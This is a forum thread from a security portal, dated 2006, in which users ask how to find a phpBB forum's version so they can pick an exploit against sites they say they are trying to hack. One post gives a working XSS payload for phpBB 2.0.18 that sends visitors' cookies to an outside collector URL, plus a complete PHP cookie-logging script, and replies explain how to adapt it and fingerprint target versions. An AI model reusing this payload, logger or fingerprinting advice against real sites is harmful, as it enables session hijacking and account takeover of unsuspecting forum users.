Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 208
Members: 0
Total: 208
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> How to find out PHPBB version.
Post new topicReply to topic View previous topic :: View next topic
How to find out PHPBB version.
PostPosted: Fri Apr 07, 2006 12:31 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Ok, So I have the site I have the exploits but I dont know which to use.

How do I find out which version they have. Shocked
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 12:33 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




http://www.site.com/forum/docs/CHANGELOG.html

where 'site.com/forum' is the actual forum URL
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 1:11 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Cheers man, works like a teapot.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 1:16 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Ok, Now this forum has a 2.0.18.

Therefore, I use this:

Quote:
<pre a=">" onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b="<pre" >


cookies.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a'); //chmod 777 log.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>


Could someone just tell me what bits I change.

Thanks. Very Happy
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 2:27 pm Reply with quote
Aryan-Husky
Active user
Active user
Joined: Apr 03, 2006
Posts: 37




Check previous post, the only think to change is the location of your server, I also think your target phpBB needs to have html set to on.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 4:21 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Do I change the server to MY website or the 'enemys' website host.

If its the person im trying to hack, how do I get their server details? Shocked
View user's profile Send private message
PostPosted: Wed May 10, 2006 10:10 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
Joined: May 11, 2006
Posts: 5




sljyro wrote:
http://www.site.com/forum/docs/CHANGELOG.html

where 'site.com/forum' is the actual forum URL


This doesn't seem to work on the forum i'm trying to gain access to. Any1 have any other ideas besides this one, /docs/INSTALL.html?
View user's profile Send private message
PostPosted: Thu May 11, 2006 6:18 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




well theres a flaw with that, the use might have updated the forum, but not the docs, which happens in many cases. so that way is never 100%.

if it doesnt work (and you are sure its a phpBB and putting the correct url), there's a possibility the user has moved/deleted the docs folder from the server.
View user's profile Send private message
PostPosted: Thu May 11, 2006 7:07 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
Joined: May 11, 2006
Posts: 5




Yeah, i'm sure i typed it correctly and it is a phpBB forum. I tried it on another site and it worked.

The site was revamped to a phpBB forum Jan this year so culd that determine what version they're running?
View user's profile Send private message
PostPosted: Thu May 11, 2006 10:20 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




if its jan, could be a 2.0.18 or .19
View user's profile Send private message
PostPosted: Fri May 12, 2006 4:54 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
Joined: May 11, 2006
Posts: 5




Ah, thanx for da help dude.
View user's profile Send private message
PostPosted: Mon Jul 03, 2006 7:58 pm Reply with quote
superninja
Active user
Active user
Joined: Jul 03, 2006
Posts: 38




Where it says what version is? Embarassed
View user's profile Send private message
PostPosted: Mon Jul 03, 2006 9:51 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




superninja wrote:
Where it says what version is? Embarassed


Take a good look at changelog and you will see, what is the latest version, described Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 26, 2006 12:38 am Reply with quote
VanVip
Beginner
Beginner
Joined: Nov 21, 2005
Posts: 4




hey... my question is: how can i get the version if the URL is not like site.com/forum... it's 'site'.forump.com... i did: 'site'.forump.com/doc/CHANGELOG.html but it doesn't works... how can i get the version in forums like this ?
View user's profile Send private message
PostPosted: Thu Jul 27, 2006 12:40 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




VanVip wrote:
hey... my question is: how can i get the version if the URL is not like site.com/forum... it's 'site'.forump.com... i did: 'site'.forump.com/doc/CHANGELOG.html but it doesn't works... how can i get the version in forums like this ?


try docs

and not doc
View user's profile Send private message
How to find out PHPBB version.
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.310 Seconds